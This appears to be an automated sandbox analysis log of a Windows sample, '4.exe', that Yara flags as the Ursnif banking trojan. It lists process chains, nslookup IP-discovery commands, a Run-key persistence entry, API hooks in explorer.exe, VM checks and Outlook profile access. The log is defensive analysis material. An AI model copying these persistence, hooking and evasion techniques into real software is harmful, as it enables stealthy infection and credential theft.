            Source: C:\Users\user\Desktop\4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
            Source: 4.exeVirustotal: Detection: 78%
            Source: 4.exeReversingLabs: Detection: 79%
            Source: unknownProcess created: C:\Users\user\Desktop\4.exe 'C:\Users\user\Desktop\4.exe'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A83F.bi1'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1'
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A83F.bi1'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A73F.bi1'Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\A83F.bi1'Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A73F.bi1'Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\A83F.bi1'Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
            Source: C:\Windows\System32\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.372476514.0000000006FE0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: 4.exe, 00000000.00000003.347072067.0000000002FF0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000000F.00000003.431916268.0000000006C20000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: 4.exe, 00000000.00000003.347072067.0000000002FF0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: explorer.exe, 0000000F.00000003.431916268.0000000006C20000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.372476514.0000000006FE0000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A5337 push ecx; ret 0_2_020A5347
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A52F0 push ecx; ret 0_2_020A52F9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A1CC1B push ecx; mov dword ptr [esp], 00000002h37_2_02A1CC1C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 37_2_02A2713B push ecx; ret 37_2_02A2714B

            Boot Survival:

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)Show sources
            Source: C:\Users\user\Desktop\4.exeWindow found: window name: ProgManJump to behavior
            Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AppVilotJump to behavior
            Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AppVilotJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.347648132.000001ED61700000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.526191335.0000020E08F3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.390938718.00000232E0DD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 1632, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6733C9B4-9A99-311C-DC8B-6EF5D0EF82F9Jump to behavior
            Source: C:\Users\user\Desktop\4.exeKey value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\6733C9B4-9A99-311C-DC8B-6EF5D0EF82F9 Client32Jump to behavior
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Users\user\Desktop\4.exe TID: 6760Thread sleep count: 83 > 30Jump to behavior
            Source: C:\Users\user\Desktop\4.exe TID: 6756Thread sleep count: 47 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\4.exeCode function: 0_2_020A3B4B CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_020A3B4B
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5B954 FindFirstFileW,DeleteFileW,FindNextFileW,15_2_03B5B954
            Source: C:\Windows\explorer.exeCode function: 15_2_03B5A684 CreateFileA,FindCloseChangeNotification,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,15_2_03B5A684
            Source: C:\Windows\explorer.exeCode function: 15_2_03B53CAC FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,15_2_03B53CAC